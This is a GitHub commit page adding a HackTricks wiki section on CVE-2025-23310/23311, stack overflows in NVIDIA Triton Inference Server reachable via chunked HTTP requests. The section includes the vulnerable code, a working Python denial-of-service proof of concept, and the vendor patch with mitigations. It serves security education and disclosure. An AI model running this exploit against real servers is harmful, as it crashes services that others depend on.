Skip to content

Commit a78fd36

Browse files
authored
Merge pull request #1241 from HackTricks-wiki/update_Uncovering_memory_corruption_in_NVIDIA_Triton__as__20250805_124236
Uncovering memory corruption in NVIDIA Triton (as a new hire...
2 parents eaa7e4c + 27be343 commit a78fd36

File tree

1 file changed

+64
-0
lines changed
  • src/binary-exploitation/stack-overflow

1 file changed

+64
-0
lines changed

src/binary-exploitation/stack-overflow/README.md

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -131,8 +131,72 @@ Even though stack canaries abort the process, an attacker still gains a **Denial
131131
* Always provide a **maximum field width** (e.g. `%511s`).
132132
* Prefer safer alternatives such as `snprintf`/`strncpy_s`.
133133

134+
### Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)
135+
136+
NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple **stack-based overflows** reachable through its HTTP API.
137+
The vulnerable pattern repeatedly appeared in `http_server.cc` and `sagemaker_server.cc`:
138+
139+
```c
140+
int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
141+
if (n > 0) {
142+
/* allocates 16 * n bytes on the stack */
143+
struct evbuffer_iovec *v = (struct evbuffer_iovec *)
144+
alloca(sizeof(struct evbuffer_iovec) * n);
145+
...
146+
}
147+
```
148+
149+
1. `evbuffer_peek` (libevent) returns the **number of internal buffer segments** that compose the current HTTP request body.
150+
2. Each segment causes a **16-byte** `evbuffer_iovec` to be allocated on the **stack** via `alloca()`**without any upper bound**.
151+
3. By abusing **HTTP _chunked transfer-encoding_**, a client can force the request to be split into **hundreds-of-thousands of 6-byte chunks** (`"1\r\nA\r\n"`). This makes `n` grow unbounded until the stack is exhausted.
152+
153+
#### Proof-of-Concept (DoS)
154+
```python
155+
#!/usr/bin/env python3
156+
import socket, sys
157+
158+
def exploit(host="localhost", port=8000, chunks=523_800):
159+
s = socket.create_connection((host, port))
160+
s.sendall((
161+
f"POST /v2/models/add_sub/infer HTTP/1.1\r\n"
162+
f"Host: {host}:{port}\r\n"
163+
"Content-Type: application/octet-stream\r\n"
164+
"Inference-Header-Content-Length: 0\r\n"
165+
"Transfer-Encoding: chunked\r\n"
166+
"Connection: close\r\n\r\n"
167+
).encode())
168+
169+
for _ in range(chunks): # 6-byte chunk ➜ 16-byte alloc
170+
s.send(b"1\r\nA\r\n") # amplification factor ≈ 2.6x
171+
s.sendall(b"0\r\n\r\n") # end of chunks
172+
s.close()
173+
174+
if __name__ == "__main__":
175+
exploit(*sys.argv[1:])
176+
```
177+
A ~3 MB request is enough to overwrite the saved return address and **crash** the daemon on a default build.
178+
179+
#### Patch & Mitigation
180+
The 25.07 release replaces the unsafe stack allocation with a **heap-backed `std::vector`** and gracefully handles `std::bad_alloc`:
181+
182+
```c++
183+
std::vector<evbuffer_iovec> v_vec;
184+
try {
185+
v_vec = std::vector<evbuffer_iovec>(n);
186+
} catch (const std::bad_alloc &e) {
187+
return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
188+
}
189+
struct evbuffer_iovec *v = v_vec.data();
190+
```
191+
192+
Lessons learned:
193+
* Never call `alloca()` with attacker-controlled sizes.
194+
* Chunked requests can drastically change the shape of server-side buffers.
195+
* Validate / cap any value derived from client input *before* using it in memory allocations.
196+
134197
## References
135198
* [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
199+
* [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)
136200
137201
{{#include ../../banners/hacktricks-training.md}}
138202

0 commit comments

Comments
 (0)